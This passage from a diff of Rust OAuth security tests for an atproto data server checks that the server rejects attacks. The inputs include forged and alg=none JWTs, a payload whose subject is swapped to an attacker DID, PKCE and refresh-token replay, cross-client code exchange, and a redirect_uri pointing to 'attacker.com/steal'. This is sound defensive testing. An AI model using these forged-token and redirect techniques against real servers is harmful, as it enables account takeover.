= verify_new_account(&http_client, user_did).await; 613 + 614 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 615 + let client_id = mock_client.uri(); 616 + let (_, code_challenge) = generate_pkce(); 617 + 618 + let par_res = http_client 619 + .post(format!("{}/oauth/par", url)) 620 + .form(&[ 621 + ("response_type", "code"), 622 + ("client_id", &client_id), 623 + ("redirect_uri", redirect_uri), 624 + ("code_challenge", &code_challenge), 625 + ("code_challenge_method", "S256"), 626 + ("scope", "atproto transition:generic"), 627 + ]) 628 + .send() 629 + .await 630 + .unwrap(); 631 + let par_body: Value = par_res.json().await.unwrap(); 632 + let request_uri = par_body["request_uri"].as_str().unwrap(); 633 + 634 + let auth_res = http_client 635 + .post(format!("{}/oauth/authorize", url)) 636 + .header("Accept", "application/json") 637 + .json(&json!({ 638 + "request_uri": request_uri, 639 + "username": &handle, 640 + "password": password, 641 + "remember_device": false 642 + })) 643 + .send() 644 + .await 645 + .unwrap(); 646 + assert_eq!(auth_res.status(), StatusCode::OK, "Auth should succeed"); 647 + 648 + let consent_post_res = http_client 649 + .post(format!("{}/oauth/authorize/consent", url)) 650 + .json(&json!({ 651 + "request_uri": request_uri, 652 + "approved_scopes": ["transition:generic"], 653 + "remember": false 654 + })) 655 + .send() 656 + .await 657 + .unwrap(); 658 + 659 + assert_eq!( 660 + consent_post_res.status(), 661 + StatusCode::BAD_REQUEST, 662 + "Should reject consent without atproto scope" 663 + ); 664 + let error_body: Value = consent_post_res.json().await.unwrap(); 665 + assert!( 666 + error_body["error_description"] 667 + .as_str() 668 + .unwrap() 669 + .contains("atproto") 670 + ); 671 + } 672 + 673 + #[tokio::test] 674 + async fn test_token_contains_requested_scope() { 675 + let scope = "atproto transition:generic"; 676 + let (session, _mock) = create_user_and_oauth_session_with_scope( 677 + "scope-token", 678 + "https://example.com/callback", 679 + scope, 680 + ) 681 + .await; 682 + 683 + assert_eq!( 684 + session.scope, scope, 685 + "Session should have the requested scope" 686 + ); 687 + 688 + let parts: Vec<&str> = session.access_token.split('.').collect(); 689 + assert_eq!(parts.len(), 3, "Token should be a valid JWT"); 690 + 691 + let payload_json = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 692 + let payload: Value = serde_json::from_slice(&payload_json).unwrap(); 693 + 694 + assert!( 695 + payload["scope"].is_string(), 696 + "Token payload should contain scope" 697 + ); 698 + let token_scope = payload["scope"].as_str().unwrap(); 699 + assert!( 700 + token_scope.contains("atproto"), 701 + "Token scope should contain atproto" 702 + ); 703 + } 704 + 705 + #[tokio::test] 706 + async fn test_dereference_scope_endpoint() { 707 + let url = base_url().await; 708 + let http_client = client(); 709 + let (session, _mock) = create_user_and_oauth_session_with_scope( 710 + "scope-deref", 711 + "https://example.com/callback", 712 + "atproto", 713 + ) 714 + .await; 715 + 716 + let deref_res = http_client 717 + .post(format!("{}/xrpc/com.atproto.temp.dereferenceScope", url)) 718 + .bearer_auth(&session.access_token) 719 + .json(&json!({ 720 + "scope": "atproto transition:generic" 721 + })) 722 + .send() 723 + .await 724 + .unwrap(); 725 + 726 + assert_eq!(deref_res.status(), StatusCode::OK); 727 + let deref_body: Value = deref_res.json().await.unwrap(); 728 + assert!(deref_body["scope"].is_string()); 729 + let resolved_scope = deref_body["scope"].as_str().unwrap(); 730 + assert!(resolved_scope.contains("atproto")); 731 + assert!(resolved_scope.contains("transition:generic")); 732 + } 733 + 734 + #[tokio::test] 735 + async fn test_dereference_scope_requires_auth() { 736 + let url = base_url().await; 737 + let http_client = client(); 738 + 739 + let deref_res = http_client 740 + .post(format!("{}/xrpc/com.atproto.temp.dereferenceScope", url)) 741 + .json(&json!({ 742 + "scope": "atproto" 743 + })) 744 + .send() 745 + .await 746 + .unwrap(); 747 + 748 + assert_eq!( 749 + deref_res.status(), 750 + StatusCode::UNAUTHORIZED, 751 + "Should require authentication" 752 + ); 753 + }
+769 -181
tests/oauth_security.rs
··· 2 mod common; 3 mod helpers; 4 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 5 - use tranquil_pds::oauth::dpop::{DPoPJwk, DPoPVerifier, compute_jwk_thumbprint}; 6 use chrono::Utc; 7 use common::{base_url, client}; 8 use helpers::verify_new_account; 9 - use reqwest::{StatusCode, redirect}; 10 use serde_json::{Value, json}; 11 use sha2::{Digest, Sha256}; 12 use wiremock::matchers::{method, path}; 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 - 15 - fn no_redirect_client() -> reqwest::Client { 16 - reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap() 17 - } 18 19 fn generate_pkce() -> (String, String) { 20 let verifier_bytes: [u8; 32] = rand::random(); ··· 36 "token_endpoint_auth_method": "none", 37 "dpop_bound_access_tokens": false 38 }); 39 - Mock::given(method("GET")).and(path("/")) 40 .respond_with(ResponseTemplate::new(200).set_body_json(metadata)) 41 - .mount(&mock_server).await; 42 mock_server 43 } 44 ··· 55 let mock_client = setup_mock_client_metadata(redirect_uri).await; 56 let client_id = mock_client.uri(); 57 let (code_verifier, code_challenge) = generate_pkce(); 58 - let par_body: Value = http_client.post(format!("{}/oauth/par", url)) 59 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 60 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 61 - .send().await.unwrap().json().await.unwrap(); 62 let request_uri = par_body["request_uri"].as_str().unwrap(); 63 - let auth_client = no_redirect_client(); 64 - let auth_res = auth_client.post(format!("{}/oauth/authorize", url)) 65 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", "security-test-password"), ("remember_device", "false")]) 66 .send().await.unwrap(); 67 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 68 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 69 - let token_body: Value = http_client.post(format!("{}/oauth/token", url)) 70 - .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 71 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 72 - .send().await.unwrap().json().await.unwrap(); 73 - (token_body["access_token"].as_str().unwrap().to_string(), 74 - token_body["refresh_token"].as_str().unwrap().to_string(), client_id) 75 } 76 77 #[tokio::test] ··· 83 assert_eq!(parts.len(), 3); 84 let forged_sig = URL_SAFE_NO_PAD.encode(&[0u8; 32]); 85 let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_sig); 86 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 87 - .bearer_auth(&forged_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected"); 88 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 89 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 90 payload["sub"] = json!("did:plc:attacker"); 91 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 92 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 93 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 94 - .bearer_auth(&modified_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected"); 95 let none_header = json!({ "alg": "none", "typ": "at+jwt" }); 96 let none_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:attacker", "aud": "https://test.pds", 97 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "fake", "scope": "atproto" }); 98 - let none_token = format!("{}.{}.", URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_header).unwrap()), 99 - URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap())); 100 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 101 - .bearer_auth(&none_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "alg=none should be rejected"); 102 let rs256_header = json!({ "alg": "RS256", "typ": "at+jwt" }); 103 - let rs256_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&rs256_header).unwrap()), 104 - URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 64])); 105 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 106 - .bearer_auth(&rs256_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Algorithm substitution should be rejected"); 107 let expired_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:test", "aud": "https://test.pds", 108 "iat": Utc::now().timestamp() - 7200, "exp": Utc::now().timestamp() - 3600, "jti": "expired" }); 109 - let expired_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&json!({"alg":"HS256","typ":"at+jwt"})).unwrap()), 110 - URL_SAFE_NO_PAD.encode(serde_json::to_string(&expired_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32])); 111 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 112 - .bearer_auth(&expired_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected"); 113 } 114 115 #[tokio::test] ··· 119 let redirect_uri = "https://example.com/pkce-callback"; 120 let mock_client = setup_mock_client_metadata(redirect_uri).await; 121 let client_id = mock_client.uri(); 122 - let res = http_client.post(format!("{}/oauth/par", url)) 123 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 124 - ("code_challenge", "plain-text-challenge"), ("code_challenge_method", "plain")]) 125 - .send().await.unwrap(); 126 - assert_eq!(res.status(), StatusCode::BAD_REQUEST, "PKCE plain method should be rejected"); 127 let body: Value = res.json().await.unwrap(); 128 - assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("s256")); 129 - let res = http_client.post(format!("{}/oauth/par", url)) 130 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri)]) 131 - .send().await.unwrap(); 132 - assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected"); 133 let ts = Utc::now().timestamp_millis(); 134 let handle = format!("pkce-attack-{}", ts); 135 let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) ··· 139 verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 140 let (_, code_challenge) = generate_pkce(); 141 let (attacker_verifier, _) = generate_pkce(); 142 - let par_body: Value = http_client.post(format!("{}/oauth/par", url)) 143 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 144 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 145 - .send().await.unwrap().json().await.unwrap(); 146 let request_uri = par_body["request_uri"].as_str().unwrap(); 147 - let auth_client = no_redirect_client(); 148 - let auth_res = auth_client.post(format!("{}/oauth/authorize", url)) 149 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", "pkce-password"), ("remember_device", "false")]) 150 - .send().await.unwrap(); 151 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 152 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 153 - let token_res = http_client.post(format!("{}/oauth/token", url)) 154 - .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 155 - ("code_verifier", &attacker_verifier), ("client_id", &client_id)]) 156 .send().await.unwrap(); 157 - assert_eq!(token_res.status(), StatusCode::BAD_REQUEST, "Wrong PKCE verifier should be rejected"); 158 } 159 160 #[tokio::test] ··· 172 let mock_client = setup_mock_client_metadata(redirect_uri).await; 173 let client_id = mock_client.uri(); 174 let (code_verifier, code_challenge) = generate_pkce(); 175 - let par_body: Value = http_client.post(format!("{}/oauth/par", url)) 176 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 177 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 178 - .send().await.unwrap().json().await.unwrap(); 179 let request_uri = par_body["request_uri"].as_str().unwrap(); 180 - let auth_client = no_redirect_client(); 181 - let auth_res = auth_client.post(format!("{}/oauth/authorize", url)) 182 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", "replay-password"), ("remember_device", "false")]) 183 .send().await.unwrap(); 184 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 185 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap().to_string(); 186 - let first = http_client.post(format!("{}/oauth/token", url)) 187 - .form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri), 188 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 189 - .send().await.unwrap(); 190 assert_eq!(first.status(), StatusCode::OK, "First use should succeed"); 191 let first_body: Value = first.json().await.unwrap(); 192 - let replay = http_client.post(format!("{}/oauth/token", url)) 193 - .form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri), 194 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 195 - .send().await.unwrap(); 196 - assert_eq!(replay.status(), StatusCode::BAD_REQUEST, "Auth code replay should fail"); 197 let stolen_rt = first_body["refresh_token"].as_str().unwrap().to_string(); 198 - let first_refresh: Value = http_client.post(format!("{}/oauth/token", url)) 199 - .form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)]) 200 - .send().await.unwrap().json().await.unwrap(); 201 - assert!(first_refresh["access_token"].is_string(), "First refresh should succeed"); 202 let new_rt = first_refresh["refresh_token"].as_str().unwrap(); 203 - let rt_replay = http_client.post(format!("{}/oauth/token", url)) 204 - .form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)]) 205 - .send().await.unwrap(); 206 - assert_eq!(rt_replay.status(), StatusCode::BAD_REQUEST, "Refresh token replay should fail"); 207 let body: Value = rt_replay.json().await.unwrap(); 208 - assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("reuse")); 209 - let family_revoked = http_client.post(format!("{}/oauth/token", url)) 210 - .form(&[("grant_type", "refresh_token"), ("refresh_token", new_rt), ("client_id", &client_id)]) 211 - .send().await.unwrap(); 212 - assert_eq!(family_revoked.status(), StatusCode::BAD_REQUEST, "Token family should be revoked"); 213 } 214 215 #[tokio::test] ··· 220 let mock_client = setup_mock_client_metadata(registered_redirect).await; 221 let client_id = mock_client.uri(); 222 let (_, code_challenge) = generate_pkce(); 223 - let res = http_client.post(format!("{}/oauth/par", url)) 224 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", "https://attacker.com/steal"), 225 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 226 - .send().await.unwrap(); 227 - assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected"); 228 let ts = Utc::now().timestamp_millis(); 229 let handle = format!("deact-{}", ts); 230 let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) ··· 232 .send().await.unwrap(); 233 let account: Value = create_res.json().await.unwrap(); 234 let access_jwt = verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 235 - http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 236 - .bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap(); 237 - let deact_par: Value = http_client.post(format!("{}/oauth/par", url)) 238 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", registered_redirect), 239 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 240 - .send().await.unwrap().json().await.unwrap(); 241 let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 242 .header("Accept", "application/json") 243 - .form(&[("request_uri", deact_par["request_uri"].as_str().unwrap()), ("username", &handle), ("password", "deact-password"), ("remember_device", "false")]) 244 .send().await.unwrap(); 245 - assert_eq!(auth_res.status(), StatusCode::FORBIDDEN, "Deactivated account should be blocked"); 246 let redirect_uri_a = "https://app-a.com/callback"; 247 let mock_a = setup_mock_client_metadata(redirect_uri_a).await; 248 let client_id_a = mock_a.uri(); ··· 256 let account2: Value = create_res2.json().await.unwrap(); 257 verify_new_account(&http_client, account2["did"].as_str().unwrap()).await; 258 let (code_verifier2, code_challenge2) = generate_pkce(); 259 - let par_a: Value = http_client.post(format!("{}/oauth/par", url)) 260 - .form(&[("response_type", "code"), ("client_id", &client_id_a), ("redirect_uri", redirect_uri_a), 261 - ("code_challenge", &code_challenge2), ("code_challenge_method", "S256")]) 262 - .send().await.unwrap().json().await.unwrap(); 263 - let auth_client = no_redirect_client(); 264 - let auth_a = auth_client.post(format!("{}/oauth/authorize", url)) 265 - .form(&[("request_uri", par_a["request_uri"].as_str().unwrap()), ("username", &handle2), ("password", "cross-password"), ("remember_device", "false")]) 266 .send().await.unwrap(); 267 - let loc_a = auth_a.headers().get("location").unwrap().to_str().unwrap(); 268 - let code_a = loc_a.split("code=").nth(1).unwrap().split('&').next().unwrap(); 269 - let cross_client = http_client.post(format!("{}/oauth/token", url)) 270 - .form(&[("grant_type", "authorization_code"), ("code", code_a), ("redirect_uri", redirect_uri_a), 271 - ("code_verifier", &code_verifier2), ("client_id", &client_id_b)]) 272 - .send().await.unwrap(); 273 - assert_eq!(cross_client.status(), StatusCode::BAD_REQUEST, "Cross-client code exchange must be rejected"); 274 } 275 276 #[tokio::test] 277 async fn test_malformed_tokens_and_headers() { 278 let url = base_url().await; 279 let http_client = client(); 280 - let malformed = vec!["", "not-a-token", "one.two", "one.two.three.four", "....", "eyJhbGciOiJIUzI1NiJ9", 281 - "eyJhbGciOiJIUzI1NiJ9.", "eyJhbGciOiJIUzI1NiJ9..", ".eyJzdWIiOiJ0ZXN0In0.", "!!invalid!!.eyJ9.sig"]; 282 for token in &malformed { 283 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 284 - .bearer_auth(token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 285 } 286 let wrong_types = vec!["JWT", "jwt", "at+JWT", ""]; 287 for typ in wrong_types { 288 let header = json!({ "alg": "HS256", "typ": typ }); 289 let payload = json!({ "iss": "x", "sub": "did:plc:x", "aud": "x", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "x" }); 290 - let token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()), 291 - URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32])); 292 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 293 - .bearer_auth(&token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "typ='{}' should be rejected", typ); 294 } 295 let (access_token, _, _) = get_oauth_tokens(&http_client, url).await; 296 - let invalid_formats = vec![format!("Basic {}", access_token), format!("Digest {}", access_token), 297 - access_token.clone(), format!("Bearer{}", access_token)]; 298 for auth in &invalid_formats { 299 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 300 - .header("Authorization", auth).send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 301 } 302 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 303 - .send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 304 - assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 305 - .header("Authorization", "").send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 306 - let grants = vec!["client_credentials", "password", "implicit", "", "AUTHORIZATION_CODE"]; 307 for grant in grants { 308 - assert_eq!(http_client.post(format!("{}/oauth/token", url)) 309 - .form(&[("grant_type", grant), ("client_id", "https://example.com")]) 310 - .send().await.unwrap().status(), StatusCode::BAD_REQUEST, "Grant '{}' should be rejected", grant); 311 } 312 } 313 ··· 316 let url = base_url().await; 317 let http_client = client(); 318 let (access_token, refresh_token, _) = get_oauth_tokens(&http_client, url).await; 319 - assert_eq!(http_client.post(format!("{}/oauth/revoke", url)) 320 - .form(&[("token", &refresh_token)]).send().await.unwrap().status(), StatusCode::OK); 321 - let introspect: Value = http_client.post(format!("{}/oauth/introspect", url)) 322 - .form(&[("token", &access_token)]).send().await.unwrap().json().await.unwrap(); 323 - assert_eq!(introspect["active"], false, "Revoked token should be inactive"); 324 } 325 326 - fn create_dpop_proof(method: &str, uri: &str, _nonce: Option<&str>, ath: Option<&str>, iat_offset: i64) -> String { 327 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 328 use p256::elliptic_curve::sec1::ToEncodedPoint; 329 let signing_key = SigningKey::random(&mut rand::thread_rng()); ··· 333 let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } }); 334 let mut payload = json!({ "jti": format!("unique-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 335 "htm": method, "htu": uri, "iat": Utc::now().timestamp() + iat_offset }); 336 - if let Some(a) = ath { payload["ath"] = json!(a); } 337 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 338 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 339 let signing_input = format!("{}.{}", header_b64, payload_b64); 340 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 341 - format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())) 342 } 343 344 #[test] ··· 350 let nonce = v1.generate_nonce(); 351 assert!(!nonce.is_empty()); 352 assert!(v1.validate_nonce(&nonce).is_ok(), "Valid nonce should pass"); 353 - assert!(v2.validate_nonce(&nonce).is_err(), "Nonce from different secret should fail"); 354 let nonce_bytes = URL_SAFE_NO_PAD.decode(&nonce).unwrap(); 355 let mut tampered = nonce_bytes.clone(); 356 - if !tampered.is_empty() { tampered[0] ^= 0xFF; } 357 - assert!(v1.validate_nonce(&URL_SAFE_NO_PAD.encode(&tampered)).is_err(), "Tampered nonce should fail"); 358 assert!(v1.validate_nonce("invalid").is_err()); 359 assert!(v1.validate_nonce("").is_err()); 360 assert!(v1.validate_nonce("!!!not-base64!!!").is_err()); ··· 364 fn test_dpop_proof_validation() { 365 let secret = b"test-dpop-secret-32-bytes-long!!"; 366 let verifier = DPoPVerifier::new(secret); 367 - assert!(verifier.verify_proof("not.enough", "POST", "https://example.com", None).is_err()); 368 - assert!(verifier.verify_proof("invalid", "POST", "https://example.com", None).is_err()); 369 let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0); 370 - assert!(verifier.verify_proof(&proof, "GET", "https://example.com/token", None).is_err(), "Method mismatch"); 371 - assert!(verifier.verify_proof(&proof, "POST", "https://other.com/token", None).is_err(), "URI mismatch"); 372 - assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None).is_ok(), "Query params should be ignored"); 373 let old_proof = create_dpop_proof("POST", "https://example.com/token", None, None, -600); 374 - assert!(verifier.verify_proof(&old_proof, "POST", "https://example.com/token", None).is_err(), "iat too old"); 375 let future_proof = create_dpop_proof("POST", "https://example.com/token", None, None, 600); 376 - assert!(verifier.verify_proof(&future_proof, "POST", "https://example.com/token", None).is_err(), "iat in future"); 377 - let ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, Some("wrong"), 0); 378 - assert!(verifier.verify_proof(&ath_proof, "GET", "https://example.com/resource", Some("correct")).is_err(), "ath mismatch"); 379 let no_ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, None, 0); 380 - assert!(verifier.verify_proof(&no_ath_proof, "GET", "https://example.com/resource", Some("expected")).is_err(), "Missing ath"); 381 } 382 383 #[test] ··· 398 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 399 let signing_input = format!("{}.{}", header_b64, payload_b64); 400 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 401 - let mismatched = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())); 402 - assert!(verifier.verify_proof(&mismatched, "POST", "https://example.com/token", None).is_err(), "Mismatched key should fail"); 403 let point = signing_key.verifying_key().to_encoded_point(false); 404 let good_header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", 405 "x": URL_SAFE_NO_PAD.encode(point.x().unwrap()), "y": URL_SAFE_NO_PAD.encode(point.y().unwrap()) } }); ··· 409 let mut sig_bytes = good_sig.to_bytes().to_vec(); 410 sig_bytes[0] ^= 0xFF; 411 let tampered = format!("{}.{}", good_input, URL_SAFE_NO_PAD.encode(&sig_bytes)); 412 - assert!(verifier.verify_proof(&tampered, "POST", "https://example.com/token", None).is_err(), "Tampered sig should fail"); 413 } 414 415 #[test] 416 fn test_jwk_thumbprint() { 417 - let jwk = DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), 418 x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()), 419 - y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()) }; 420 let tp1 = compute_jwk_thumbprint(&jwk).unwrap(); 421 let tp2 = compute_jwk_thumbprint(&jwk).unwrap(); 422 assert_eq!(tp1, tp2, "Thumbprint should be deterministic"); 423 assert!(!tp1.is_empty()); 424 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("secp256k1".to_string()), 425 - x: Some("x".to_string()), y: Some("y".to_string()) }).is_ok()); 426 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "OKP".to_string(), crv: Some("Ed25519".to_string()), 427 - x: Some("x".to_string()), y: None }).is_ok()); 428 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: None, x: Some("x".to_string()), y: Some("y".to_string()) }).is_err()); 429 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: None, y: Some("y".to_string()) }).is_err()); 430 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: Some("x".to_string()), y: None }).is_err()); 431 - assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "RSA".to_string(), crv: None, x: None, y: None }).is_err()); 432 } 433 434 #[test] ··· 437 use p256::elliptic_curve::sec1::ToEncodedPoint; 438 let secret = b"test-dpop-secret-32-bytes-long!!"; 439 let verifier = DPoPVerifier::new(secret); 440 - let test_cases = vec![(-600, true), (-301, true), (-299, false), (0, false), (299, false), (301, true), (600, true)]; 441 for (offset, should_fail) in test_cases { 442 let signing_key = SigningKey::random(&mut rand::thread_rng()); 443 let point = signing_key.verifying_key().to_encoded_point(false); ··· 450 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 451 let signing_input = format!("{}.{}", header_b64, payload_b64); 452 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 453 - let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())); 454 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 455 - if should_fail { assert!(result.is_err(), "offset {} should fail", offset); } 456 - else { assert!(result.is_ok(), "offset {} should pass", offset); } 457 } 458 } 459 ··· 474 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 475 let signing_input = format!("{}.{}", header_b64, payload_b64); 476 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 477 - let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())); 478 - assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token", None).is_ok(), "HTTP method should be case-insensitive"); 479 }
··· 2 mod common; 3 mod helpers; 4 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 5 use chrono::Utc; 6 use common::{base_url, client}; 7 use helpers::verify_new_account; 8 + use reqwest::StatusCode; 9 use serde_json::{Value, json}; 10 use sha2::{Digest, Sha256}; 11 + use tranquil_pds::oauth::dpop::{DPoPJwk, DPoPVerifier, compute_jwk_thumbprint}; 12 use wiremock::matchers::{method, path}; 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 15 fn generate_pkce() -> (String, String) { 16 let verifier_bytes: [u8; 32] = rand::random(); ··· 32 "token_endpoint_auth_method": "none", 33 "dpop_bound_access_tokens": false 34 }); 35 + Mock::given(method("GET")) 36 + .and(path("/")) 37 .respond_with(ResponseTemplate::new(200).set_body_json(metadata)) 38 + .mount(&mock_server) 39 + .await; 40 mock_server 41 } 42 ··· 53 let mock_client = setup_mock_client_metadata(redirect_uri).await; 54 let client_id = mock_client.uri(); 55 let (code_verifier, code_challenge) = generate_pkce(); 56 + let par_body: Value = http_client 57 + .post(format!("{}/oauth/par", url)) 58 + .form(&[ 59 + ("response_type", "code"), 60 + ("client_id", &client_id), 61 + ("redirect_uri", redirect_uri), 62 + ("code_challenge", &code_challenge), 63 + ("code_challenge_method", "S256"), 64 + ]) 65 + .send() 66 + .await 67 + .unwrap() 68 + .json() 69 + .await 70 + .unwrap(); 71 let request_uri = par_body["request_uri"].as_str().unwrap(); 72 + let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 73 + .header("Content-Type", "application/json") 74 + .header("Accept", "application/json") 75 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": "security-test-password", "remember_device": false})) 76 .send().await.unwrap(); 77 + let auth_body: Value = auth_res.json().await.unwrap(); 78 + let mut location = auth_body["redirect_uri"].as_str().unwrap().to_string(); 79 + if location.contains("/oauth/consent") { 80 + let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url)) 81 + .header("Content-Type", "application/json") 82 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 83 + .send().await.unwrap(); 84 + let consent_body: Value = consent_res.json().await.unwrap(); 85 + location = consent_body["redirect_uri"].as_str().unwrap().to_string(); 86 + } 87 + let code = location 88 + .split("code=") 89 + .nth(1) 